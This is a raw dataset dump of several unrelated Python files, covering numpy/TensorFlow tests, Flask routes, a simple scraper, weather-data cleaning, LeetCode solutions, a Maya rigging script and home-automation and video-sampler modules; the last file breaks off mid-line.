test_np_type_float32():\n fp = 'fp32'\n assert(utils.np_type(fp) is np.float32)\n\n\ndef test_np_type_float64():\n fp = 'fp64'\n assert(utils.np_type(fp) is np.float64)\n\n\ndef test_np_type_int32():\n fp = 'int64'\n with pytest.raises(NotImplementedError):\n dummy = utils.np_type(fp)\n\n\ndef test_get_type_numpy():\n dummy = np.zeros([], dtype=np.float32)\n assert(utils.get_type(dummy) is np.float32)\n\n\ndef test_get_type_tensorflow():\n dummy = tf.zeros([], dtype=np.float32)\n assert(utils.get_type(dummy) is tf.float32)\n\n\n@pytest.mark.parametrize(\"array\",\n [1, 0., [1.], (0, 1.), [[1.], [1]], ([0.], [1]),\n np.zeros([]), np.zeros((1, 1)), np.zeros((1,)),\n np.zeros([1, 2, 3]), None, tf.constant(0),\n tf.constant([0, 1]), 'toto'])\ndef test_data_array(array):\n if isinstance(array, str):\n with pytest.raises(BaseException):\n convert = utils.data_array(array)\n return\n convert = utils.data_array(array)\n assert(isinstance(convert, np.ndarray) or\n isinstance(convert, tf.Tensor) or\n (convert is None))\n if array is not None:\n if isinstance(array, tf.Tensor):\n tf.global_variables_initializer()\n 
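            # note: the bare tf.global_variables_initializer() call above only builds the init op; it is actually executed by the sess.run(tf.global_variables_initializer()) call inside the session below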
with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n assert(len(sess.run(convert).shape) == 2)\n else:\n assert(len(convert.shape) == 2)\n\n\n@pytest.mark.parametrize(\"ex_val\", np.random.rand(10))\ndef test_quadratic_infinimal_convolution_0(ex_val):\n tf_ex_val = tf.constant(ex_val)\n val = utils.quadratic_infinimal_convolution(tf_ex_val, 0)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val = sess.run(val)\n assert(np.isclose(val, ex_val))\n\n@pytest.mark.parametrize(\"ex_val\", np.random.rand(10))\ndef test_quadratic_infinimal_convolution_1(ex_val):\n tf_ex_val = tf.constant(ex_val)\n val = utils.quadratic_infinimal_convolution(tf_ex_val, 1)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val = sess.run(val)\n assert(np.isclose(val, ex_val ** 2))\n","sub_path":"itl/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354727469","text":"import sys\n\nfrom plugins import prefix\n\n\ndef p(arg, file_map, output_files):\n arg = arg.strip()\n if not prefix.VALID_PREFIX.match(arg):\n sys.exit(arg + ' is not a valid prefix!')\n for p_file, t_file in file_map[arg]:\n output_files[t_file] = p_file\n","sub_path":"plugins/build/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351026424","text":"from flask import Blueprint, render_template, current_app, request, url_for\nfrom flask_paginate import Pagination, get_page_parameter\nfrom sqlalchemy import func, or_\n\nfrom app import db\nfrom app.models import Entity, Link\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\n@bp.route('/index')\ndef index():\n q = request.args.get('q')\n search = q and q is not None\n\n page = request.args.get(get_page_parameter(), default=1, type=int)\n entities = db.session.query(Entity.name, Entity.uuid, Entity.type)\\\n .paginate(page, current_app.config['ENTITIES_PER_PAGE'], False).items\n total = db.session.query(func.count(Entity.uuid)).scalar()\n pagination = Pagination(page=page, total=total, search=search,\n record_name='entities',\n per_page=current_app.config['ENTITIES_PER_PAGE'],\n bs_version=4,\n inner_window=5)\n return render_template('index.html', title='Home', entities=entities,\n pagination=pagination)\n\n\n@bp.route('/entity/')\ndef profile(e_uuid):\n entity = Entity.query.filter_by(uuid=e_uuid).first()\n links = Link.query.filter(or_(Link.node_a == e_uuid, Link.node_b == e_uuid)).all()\n links_with_names = []\n for link in links:\n link = link.to_dict\n link['node_a'] = db.session.query(Entity.name, Entity.uuid) \\\n .filter(Entity.uuid == link.get('node_a')).first().name\n link['node_b'] = db.session.query(Entity.name, Entity.uuid) \\\n .filter(Entity.uuid == link.get('node_b')).first().name\n links_with_names.append(link)\n title = 'Profile: %s' % entity.name\n return render_template('profile.html', title=title, entity=entity,\n links=links_with_names)\n\n\n@bp.route('/about')\ndef about():\n return render_template('about.html', title='About')\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149874564","text":"#-*- 
coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('http://cnodejs.org/')\nbsObj = BeautifulSoup(html, 'html.parser')\n\ncontent = bsObj.find('div', {'id': 'topic_list'}).findAll('a', {'class': 'topic_title'})\n\nfor title in content:\n\tprint(title.get_text())","sub_path":"cnode/cnode.py","file_name":"cnode.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472802934","text":" #SETTING UP THE DATAFRAME\r\ndf = pd.DataFrame(records, columns=features).set_index('date') \r\n\r\n\"\"\"it is quite helpful to have subject matter knowledge in the area under investigation to aid in selecting meaningful \r\n features to investigate paired with a thoughtful assumption of likely patterns in data.\"\"\"\r\n\"\"\"much of the retrieved data will prove to be either uninformative in predicting weather temperatures or inappropriate\r\n candidates depending on the type of model being used, but the crux is that we simply do not know until we rigorously\r\n investigate the data.\"\"\"\r\n \r\n#DERIVING THE FEATURES\r\ntmp = df[['meantempm', 'meandewptm']].head(10)\r\n# 1 day prior\r\nN = 1\r\n\r\n# target measurement of mean temperature\r\nfeature = 'meantempm'\r\n\r\n# total number of rows\r\nrows = tmp.shape[0]\r\n\r\n# a list representing Nth prior measurements of feature\r\n# notice that the front of the list needs to be padded with N\r\n# None values to maintain a consistent row length for each N\r\nnth_prior_measurements = [None]*N + [tmp[feature][i-N] for i in range(N, rows)]\r\n\r\n# make a new column name of feature_N and add to DataFrame\r\ncol_name = \"{}_{}\".format(feature, N) \r\ntmp[col_name] = nth_prior_measurements \r\n\r\n#generalizing the above steps into a function to apply for all the features \r\ndef derive_nth_day_feature(df, feature, N): \r\n    rows = df.shape[0]\r\n    nth_prior_measurements = [None]*N + [df[feature][i-N] for i in range(N, rows)]\r\n    col_name = \"{}_{}\".format(feature, N)\r\n    df[col_name] = nth_prior_measurements\r\n\r\n#applied for all the features for 1_day prior, 2_day prior, 3_day prior \r\nfor feature in features: \r\n    if feature != 'date':\r\n        for N in range(1, 4):\r\n            derive_nth_day_feature(df, feature, N)\r\n    \r\n\r\n#DATA CLEANING PART\r\n#As the data in the data frame is very large we are reducing the no. of columns in the dataframe by selecting\r\n#necessary features for our project\r\n#As the goal of this project is to predict the future temperature based off the past three days of weather\r\n# measurements. 
With this in mind we only want to keep the min, max, and mean temperatures for each day \r\n# making a list of original features without meantempm, mintempm, and maxtempm\r\nto_remove = [feature \r\n             for feature in features \r\n             if feature not in ['meantempm', 'mintempm', 'maxtempm']]\r\n\r\n# make a list of columns to keep\r\nto_keep = [col for col in df.columns if col not in to_remove]\r\n\r\n# select only the columns in to_keep and assign to df\r\ndf = df[to_keep]  # df.columns to confirm whether the columns are removed or not\r\n\r\n#df.info() gives us the information of a dataframe. Initially the datatype of all the columns is object, so we need to \r\n#convert them to numeric types for performing numerical analysis\r\n\r\n#converting object type to numerical type\r\n#The errors='coerce' parameter will convert any textual values to NaNs.\r\ndf = df.apply(pd.to_numeric, errors='coerce')\r\n#df.info() to check whether the data type has changed or not\r\n\r\n\r\n#describe() will produce a DataFrame containing the count, mean, standard deviation, min, 25th percentile,\r\n#50th percentile (or median), the 75th percentile and the max value. This can be very useful information\r\n#for evaluating the distribution of the feature data.\r\n\r\n# Call describe on df and transpose it due to the large number of columns\r\nspread = df.describe().T\r\n#enter spread in the console to look at the dataframe produced by describe()\r\n\r\n\r\n#IDENTIFYING THE OUTLIERS\r\n# precalculate interquartile range for ease of use in next calculation\r\nIQR = spread['75%'] - spread['25%']\r\n\r\n# create an outliers column which is either 3 IQRs below the first quartile or\r\n# 3 IQRs above the third quartile\r\nspread['outliers'] = (spread['min']<(spread['25%']-(3*IQR)))|(spread['max'] > (spread['75%']+3*IQR))\r\n\r\n# just display the features containing extreme outliers\r\n#spread.loc[spread.outliers,] in console\r\n\r\n#ANALYSING OUTLIERS USING HISTOGRAM IN NEW DOCUMENT\r\n\r\n#DEALING WITH MISSING VALUES\r\n#type df.info() to see the dataframe info; it also shows the no. of missing values of each feature\r\n#fill the missing values with an interpolated value that is a reasonable estimation of the true values of a feature\r\n#here, as precipitation has most of the missing values, we fill them with the majority value of precipitation, i.e. 0\r\n\r\n# iterate over the precip columns\r\nfor precip_col in ['precipm_1', 'precipm_2', 'precipm_3']: \r\n    # create a boolean array of values representing nans\r\n    missing_vals = pd.isnull(df[precip_col])\r\n    df[precip_col][missing_vals] = 0\r\n\r\n#we have taken care of all possible missing values, and if any are still missing we drop the rows containing them \r\ndf = df.dropna() \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"2_settting_up_dataframe.py","file_name":"2_settting_up_dataframe.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"360514175","text":"'''\nAuthor: Puffrora\nDate: 2020-10-08 18:26:44\nLastModifiedBy: Puffrora\nLastEditTime: 2020-10-08 18:41:57\n'''\n\n\n# Time complexity O(N)\n# Space complexity O(min(N, k))\n# Use hashing with modulo arithmetic to speed things up\nclass Solution:\n    def checkSubarraySum(self, nums, k):\n\n        cur_sum = 0\n        dic = {0: -1}\n        for i, n in enumerate(nums):\n            cur_sum += n\n\n            if k != 0:\n                cur_sum %= k\n            \n            if cur_sum in dic:\n                if i - dic[cur_sum] > 1:\n                    return True\n            else:\n                dic[cur_sum] = i\n        \n        return 
False\n\n\n","sub_path":"Leetcode/leetcode523 连续的子数组和.py","file_name":"leetcode523 连续的子数组和.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197230695","text":"# footRoll Hierarchy\nimport maya.cmds as cmds\n\n\ndef footRollHierarchy(side):\n\n    cmds.parent(\"ball_\"+side+\"_loc_offset\",\"footInside_\"+side+\"_loc\")\n    cmds.parent(\"toes_\"+side+\"_loc_offset\",\"footInside_\"+side+\"_loc\")\n    cmds.parent(\"footInside_\"+side+\"_loc_offset\",\"footOutside_\"+side+\"_loc\")\n    cmds.parent(\"footOutside_\"+side+\"_loc_offset\",\"toesRoll_\"+side+\"_loc\")\n    cmds.parent(\"toesRoll_\"+side+\"_loc_offset\",\"hell_\"+side+\"_loc\")\n\n\n    # parent the locator hierarchy to the jnt\n\n    cmds.parent(\"hell_\"+side+\"_loc_offset\",\"footRoll_\"+side+\"_jnt\")\n    \n    # freeze the rotation so it has the same orientation as the ctr\n\n    cmds.makeIdentity(\"hell_\"+side+\"_loc_offset\",r=True,a=True)\n\n\ndef footRollNodes(side):\n    \n    # create the nodes and set the values they need to have\n    \n    cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"toeRoll_\"+side+\"_sub\")\n    cmds.setAttr(\"toeRoll_\"+side+\"_sub.operation\", 2, l=True)\n    cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"ballRoll_\"+side+\"_sub\")\n    cmds.setAttr(\"ballRoll_\"+side+\"_sub.operation\", 2, l=True)\n    cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"ballRollTotal_\"+side+\"_sum\")\n    cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"toeRollTotal_\"+side+\"_sub\")\n    cmds.setAttr(\"toeRollTotal_\"+side+\"_sub.operation\", 2, l=True)\n    cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"hellRollTotal_\"+side+\"_sub\")\n    cmds.setAttr(\"hellRollTotal_\"+side+\"_sub.operation\", 2, l=True)\n    \n    cmds.shadingNode(\"condition\", asUtility=True, n=\"footBank_\"+side+\"_cond\")\n    cmds.setAttr(\"footBank_\"+side+\"_cond.operation\", 4, l=True)\n    cmds.setAttr(\"footBank_\"+side+\"_cond.colorIfFalseR\", 0, l=True)\n    cmds.shadingNode(\"condition\", asUtility=True, n=\"footRollHell_\"+side+\"_cond\")\n    cmds.setAttr(\"footRollHell_\"+side+\"_cond.operation\", 4, l=True)\n    cmds.setAttr(\"footRollHell_\"+side+\"_cond.colorIfFalseR\", 0, l=True)\n    \n    cmds.shadingNode(\"clamp\", asUtility=True, n=\"toeStart_\"+side+\"_clamp\")\n    cmds.setAttr(\"toeStart_\"+side+\"_clamp.maxR\", 300, l=True)\n    cmds.shadingNode(\"clamp\", asUtility=True, n=\"ballStart_\"+side+\"_clamp\")\n    cmds.shadingNode(\"clamp\", asUtility=True, n=\"ballNegative_\"+side+\"_clamp\")\n    cmds.setAttr(\"ballNegative_\"+side+\"_clamp.maxR\", 300, l=True)\n    cmds.shadingNode(\"clamp\", asUtility=True, n=\"toeRoll_\"+side+\"_clamp\")\n\n    # connections between the footRoll nodes\n\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeStart_\"+side+\"_clamp.minR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"toeStart_\"+side+\"_clamp.inputR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toePivot\", \"toeRollTotal_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeRoll_\"+side+\"_clamp.maxR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"ballStart_\"+side+\"_clamp.inputR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"ballStart_\"+side+\"_clamp.maxR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballPivot\", \"ballRollTotal_\"+side+\"_sum.input1D[1]\",f=True, l=True)\n    
cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeSlide\", \"toesRoll_\"+side+\"_loc.rotateY\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballSlide\", \"ball_\"+side+\"_loc.rotateY\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toes\", \"toes_\"+side+\"_loc.rotateZ\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballSlide\", \"toes_\"+side+\"_loc.rotateY\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"footRollHell_\"+side+\"_cond.colorIfTrueR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"footRollHell_\"+side+\"_cond.firstTerm\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.colorIfFalseG\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.colorIfTrueR\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.firstTerm\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.hellPivot\", \"hellRollTotal_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.hellSlide\", \"hell_\"+side+\"_loc.rotateY\", f=True, l=True)\n    cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeRoll_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n\n    \n    cmds.connectAttr(\"toeStart_\"+side+\"_clamp.outputR\", \"toeRoll_\"+side+\"_sub.input1D[0]\", f=True, l=True)\n    cmds.connectAttr(\"toeRoll_\"+side+\"_sub.output1D\", \"toeRoll_\"+side+\"_clamp.inputR\", f=True, l=True)\n    cmds.connectAttr(\"toeRoll_\"+side+\"_sub.output1D\",\"toeRollTotal_\"+side+\"_sub.input1D[0]\", f=True, l=True) \n    cmds.connectAttr(\"toeRollTotal_\"+side+\"_sub.output1D\", \"toesRoll_\"+side+\"_loc.rotateZ\", f=True, l=True) \n    cmds.connectAttr(\"toeRoll_\"+side+\"_clamp.outputR\", \"ballRoll_\"+side+\"_sub.input1D[1]\", f=True, l=True) \n    cmds.connectAttr(\"ballStart_\"+side+\"_clamp.outputR\", \"ballRoll_\"+side+\"_sub.input1D[0]\",f=True, l=True) \n    cmds.connectAttr(\"ballRoll_\"+side+\"_sub.output1D\", \"ballNegative_\"+side+\"_clamp.inputR\", f=True, l=True) \n    cmds.connectAttr(\"ballNegative_\"+side+\"_clamp.outputR\",\"ballRollTotal_\"+side+\"_sum.input1D[0]\", f=True, l=True) \n    cmds.connectAttr(\"ballRollTotal_\"+side+\"_sum.output1D\", \"ball_\"+side+\"_loc.rotateZ\",f=True, l=True) \n    cmds.connectAttr(\"footBank_\"+side+\"_cond.outColorR\", \"footInside_\"+side+\"_loc.rotateX\", f=True, l=True)\n    cmds.connectAttr(\"footBank_\"+side+\"_cond.outColorG\", \"footOutside_\"+side+\"_loc.rotateX\", f=True, l=True) \n    cmds.connectAttr(\"footRollHell_\"+side+\"_cond.outColorR\", \"hellRollTotal_\"+side+\"_sub.input1D[0]\", f=True, l=True)\n    cmds.connectAttr(\"hellRollTotal_\"+side+\"_sub.output1D\", \"hell_\"+side+\"_loc.rotateZ\", f=True, l=True)\n\n    \ncmds.makeIdentity(\"footRollPosition_l_grp\",r=True,a=True)\n    \n\n\n\n\n\n\n\n\n\n","sub_path":"setup/old/olderVersions/rigging_v01/builder/footRoll.py","file_name":"footRoll.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"368782971","text":"import json\nimport os\nfrom random import randint\nimport inspect\ntry:\n    from omxplayer.player import OMXPlayer\nexcept ImportError:\n    pass\n\nfrom data_centre.browser_data import BrowserData\n\ndef get_the_current_dir_path():\n    # TODO: investigate weird path formatting differences\n    current_file_path = inspect.stack()[0][1]\n    return os.path.split(current_file_path)[0]\n\nBANK_DATA_JSON = 
'display_data.json'\nNEXT_SLOT_JSON = 'next_slot_number.json'\nSETTINGS_JSON = 'settings.json'\nEMPTY_SLOT = dict(name='', location='', length=-1, start=-1, end=-1)\nPATH_TO_DATA_OBJECTS = '{}/json_objects/'.format(get_the_current_dir_path())\n\ndef read_json(file_name):\n with open(PATH_TO_DATA_OBJECTS + file_name) as data_file:\n data = json.load(data_file)\n return data\n\n\ndef update_json(file_name, data):\n with open('{}{}'.format(PATH_TO_DATA_OBJECTS, file_name), 'w') as data_file:\n json.dump(data, data_file)\n\n\n\ndef get_path_to_browser():\n return read_json('path_to_browser.json')\n\nPATH_TO_BROWSER = get_path_to_browser()\n\n\nclass Data(object):\n def __init__(self, message_handler):\n self.browser_data = BrowserData(PATH_TO_BROWSER)\n self.message_handler = message_handler\n\n self.has_omx = self._try_import_omx()\n print('has_omx: {}'.format(self.has_omx))\n self.DEV_MODE = read_json(SETTINGS_JSON)[6][\"value\"]\n\n\n\n def create_new_slot_mapping_in_first_open(self, file_name):\n ######## used for mapping current video to next available slot ########\n memory_bank = read_json(BANK_DATA_JSON)\n for index, slot in enumerate(memory_bank):\n if (not slot['name']):\n self.create_new_slot_mapping(index, file_name)\n return True\n return False\n\n def create_new_slot_mapping(self, slot_number, file_name):\n ######## used for mapping current video to a specific slot ########\n has_location, location = self._get_path_for_file(file_name)\n print('file_name:{},has_location:{}, location:{}'.format(file_name,has_location, location))\n length = self._get_length_for_file(location)\n new_slot = dict(name=file_name, location=location, length=length, start=-1, end=-1)\n self._update_a_slots_data(slot_number, new_slot)\n\n @staticmethod\n def clear_all_slots():\n memory_bank = read_json(BANK_DATA_JSON)\n for index, slot in enumerate(memory_bank):\n memory_bank[index] = EMPTY_SLOT\n update_json(BANK_DATA_JSON, memory_bank)\n\n def update_next_slot_number(self, new_value):\n memory_bank = read_json(BANK_DATA_JSON)\n if memory_bank[new_value]['location'] == '':\n print('its empty!')\n self.message_handler.set_message('INFO', 'the slot you pressed is empty')\n else:\n update_json(NEXT_SLOT_JSON, new_value)\n\n def add_open_folder(self, folder_name):\n self.browser_data.update_open_folders(folder_name)\n\n def switch_settings(self, setting_index):\n ######## update the value of selected setting by cycling through valid options ########\n settings = read_json(SETTINGS_JSON)\n\n for index, setting in enumerate(settings):\n if index == setting_index:\n self._cycle_setting_value(setting)\n\n update_json(SETTINGS_JSON, settings)\n\n def rewrite_browser_list(self):\n return self.browser_data.generate_browser_list()\n\n def return_browser_list(self):\n return self.browser_data.browser_list\n\n @staticmethod\n def get_settings_data():\n return read_json(SETTINGS_JSON)\n\n @staticmethod\n def get_sampler_data():\n return read_json(BANK_DATA_JSON)\n\n def get_next_context(self):\n ######## loads the slot details, uses settings to modify them and then set next slot number ########\n next_slot_number = read_json(NEXT_SLOT_JSON)\n memory_bank = read_json(BANK_DATA_JSON)\n next_slot_details = memory_bank[next_slot_number]\n start_value = next_slot_details['start']\n end_value = next_slot_details['end']\n length = next_slot_details['length']\n\n use_rand_start, use_sync_length, sync_length, playback_mode = self._get_context_options_from_settings()\n\n if use_rand_start and use_sync_length:\n start_value = 
randint(0, length - sync_length)\n end_value = start_value + sync_length\n elif use_rand_start and not use_sync_length:\n start_value = randint(0, end_value)\n elif not use_rand_start and use_sync_length:\n end_value = min(length, start_value + sync_length)\n\n self._set_next_slot_number_from_playback_mode(playback_mode, next_slot_number)\n\n context = dict(location=next_slot_details['location'], name=next_slot_details['name'],\n length=next_slot_details['length'], start=start_value, end=end_value,\n slot_number=next_slot_number)\n return context\n\n def update_slot_start_to_this_time(self, slot_number, position):\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number]['start'] = position\n update_json(BANK_DATA_JSON, memory_bank)\n\n def update_slot_end_to_this_time(self, slot_number, position):\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number]['end'] = position\n update_json(BANK_DATA_JSON, memory_bank)\n\n def _get_length_for_file(self, path):\n print('getting length for: {}'.format(path))\n if self.has_omx:\n temp_player = OMXPlayer(path, args=['--alpha', '0'], dbus_name='t.t')\n duration = temp_player.duration()\n temp_player.quit()\n return duration\n else:\n return -1\n\n def _get_path_for_file(self, file_name):\n ######## returns full path for a given file name ########\n for root, dirs, files in os.walk(PATH_TO_BROWSER):\n if file_name in files:\n return True, '{}/{}'.format(root, file_name)\n return False, ''\n\n @staticmethod\n def _update_a_slots_data(slot_number, slot_info):\n ######## overwrite a given slots info with new data ########\n memory_bank = read_json(BANK_DATA_JSON)\n memory_bank[slot_number] = slot_info\n update_json(BANK_DATA_JSON, memory_bank)\n\n @staticmethod\n def _cycle_setting_value(setting):\n ######## contains the valid setting values for each applicable option ########\n if setting['name'] == 'PLAYBACK_MODE':\n if setting['value'] == 'SAMPLER':\n setting['value'] = 'PLAYLIST'\n elif setting['value'] == 'PLAYLIST':\n setting['value'] = 'RANDOM'\n else:\n setting['value'] = 'SAMPLER'\n elif setting['name'] == 'SYNC_LENGTHS':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n elif setting['name'] == 'RAND_START':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n elif setting['name'] == 'VIDEO_OUTPUT':\n if setting['value'] == 'HDMI':\n setting['value'] = 'COMPOSITE'\n else:\n setting['value'] = 'HDMI'\n elif setting['name'] == 'DEV_MODE':\n if setting['value'] == 'ON':\n setting['value'] = 'OFF'\n else:\n setting['value'] = 'ON'\n\n return setting\n\n @staticmethod\n def _get_context_options_from_settings():\n ######## looks up the settings data object and returns states of relevant options ########\n settings = read_json(SETTINGS_JSON)\n use_sync_length = False\n sync_length = 0\n use_rand_start = False\n playback_mode = ''\n\n for index, setting in enumerate(settings):\n if setting['name'] == 'SYNC_LENGTHS' and setting['value'] == 'ON':\n use_sync_length = True\n elif setting['name'] == 'SYNC_LENGTHS_TO':\n sync_length = setting['value']\n elif setting['name'] == 'RAND_START' and setting['value'] == 'ON':\n use_rand_start = True\n elif setting['name'] == 'PLAYBACK_MODE':\n playback_mode = setting['value']\n\n return use_rand_start, use_sync_length, sync_length, playback_mode\n\n @staticmethod\n def _set_next_slot_number_from_playback_mode(playback_mode, current_slot_number):\n ######## sets next slot number by using playback mode logic 
########\n next_slot_number = 0\n if playback_mode == 'SAMPLER':\n next_slot_number = current_slot_number\n elif playback_mode == 'RANDOM':\n #TODO: actually find which slots have value and only use those\n next_slot_number = randint(0,14)\n elif playback_mode == 'PLAYLIST':\n #TODO: implement some playlist objects and logic at some point\n next_slot_number = current_slot_number\n update_json('next_slot_number.json',next_slot_number)\n\n @staticmethod\n def _try_import_omx():\n try:\n from omxplayer.player import OMXPlayer\n return True\n except:\n return False\n\n\n\n\n\n\n\n","sub_path":"data_centre/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"464777659","text":"\"\"\"\n@name: Modules/Core/Drivers/interface.py\n@author: D. Brian Kimmel\n@contact: D.BrianKimmel@gmail.com\n@copyright: (c) 2013-2019 by D. Brian Kimmel\n@license: MIT License\n@note: Created on Mar 21, 2013\n@summary:\n\n\nControllers, which are attached to the server, communicate with the server via an interface.\nThere are several different interfaces at this point (2013-10-29):\n Serial\n USB - Includes HID variant\n Ethernet (Tcp)\n Null\n\nThis module reads and writes the Config for those controllers.\n\"\"\"\n\n__updated__ = '2019-09-07'\n__version_info__ = (19, 9, 1)\n__version__ = '.'.join(map(str, __version_info__))\n\n# Import system type stuff\n\n# Import PyMh files\nfrom Modules.Core.Drivers.Serial import Serial_driver\nfrom Modules.Core.Utilities.debug_tools import PrettyFormatAny\n\nfrom Modules.Core import logging_pyh as Logger\nLOG = Logger.getLogger('PyHouse.Interface ')\n\n\nclass DriverInterfaceInformation:\n \"\"\"\n ...Interface.xxxx\n \"\"\"\n\n def __init__(self):\n self.Type = None # Null, Ethernet, Serial, USB, HTML, Websockets, ...\n self.Host = None\n self.Port = None\n self._DriverApi = None # Serial_driver.API()\n # Type specific information follows\n\n\ndef _get_interface_type(p_device_obj):\n return p_device_obj.Interface.Type.lower()\n\n\ndef get_device_driver_API(p_pyhouse_obj, p_controller_obj):\n \"\"\"\n Based on the InterfaceType of the controller, load the appropriate driver and get its API().\n @return: a pointer to the device driver or None\n \"\"\"\n # LOG.debug(PrettyFormatAny.form(p_controller_obj, 'Controller'))\n # LOG.debug(PrettyFormatAny.form(p_controller_obj.Interface, 'Interface'))\n l_dev_name = p_controller_obj.Interface\n l_type = _get_interface_type(p_controller_obj)\n if l_type == 'serial':\n l_driver = Serial_driver.API(p_pyhouse_obj)\n\n elif l_type == 'ethernet':\n from Modules.Core.Drivers.Ethernet import Ethernet_driver\n l_driver = Ethernet_driver.API(p_pyhouse_obj)\n\n elif l_type == 'usb':\n from Modules.Core.Drivers.USB import USB_driver\n l_driver = USB_driver.API(p_pyhouse_obj)\n\n else:\n LOG.error('No driver for device: {} with interface type: {}'.format(\n l_dev_name, p_controller_obj.Interface.Type))\n from Modules.Core.Drivers.Null import Null_driver\n l_driver = Null_driver.API(p_pyhouse_obj)\n\n p_controller_obj.Interface._DriverApi = l_driver\n l_driver.Start(p_controller_obj)\n return l_driver\n\n\nclass Config:\n \"\"\" This abstracts the interface information.\n Used so far for lighting controllers.\n Allows for yaml config files to have a section for \"Interface:\" without defining the contents of that section;\n getting that information is the job of the particular driver XXX\n\n Interface:\n Type: Serial\n Host: 
pi-01-pp\n Port: /dev/ttyUSB0\n \n ...\n \"\"\"\n\n def load_interface(self, p_config):\n \"\"\"\n \"\"\"\n l_obj = DriverInterfaceInformation()\n l_required = ['Type', 'Host', 'Port']\n for l_key, l_value in p_config.items():\n # LOG.debug('Interface {}: = {}'.format(l_key, l_value))\n setattr(l_obj, l_key, l_value)\n # Check for data missing from the config file.\n for l_key in [l_attr for l_attr in dir(l_obj) if not l_attr.startswith('_') and not callable(getattr(l_obj, l_attr))]:\n if getattr(l_obj, l_key) == None and l_key in l_required:\n LOG.warn('Controller Yaml is missing an entry for \"{}\"'.format(l_key))\n # Append the type specific data to the Object\n if l_obj.Type == 'Serial':\n Serial_driver.Config().load_serial_config(p_config, l_obj)\n return l_obj\n\n# ## END DBK\n","sub_path":"Project/src/Modules/Core/Drivers/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16304096","text":"\"\"\"\n309. Best Time to Buy and Sell Stock with Cooldown\n\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (ie, buy one and sell one share of the stock multiple times) with the following restrictions:\n\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).\nAfter you sell your stock, you cannot buy stock on next day. (ie, cooldown 1 day)\nExample:\n\nInput: [1,2,3,0,2]\nOutput: 3\nExplanation: transactions = [buy, sell, cooldown, buy, sell]\n\n\n\"\"\"\n\n\nclass BestTimeSellStockWithCooldown:\n\n def doit_dp(self, prices):\n n = len(prices)\n dp = [[0] * 3 for _ in range(n + 1)]\n # 0 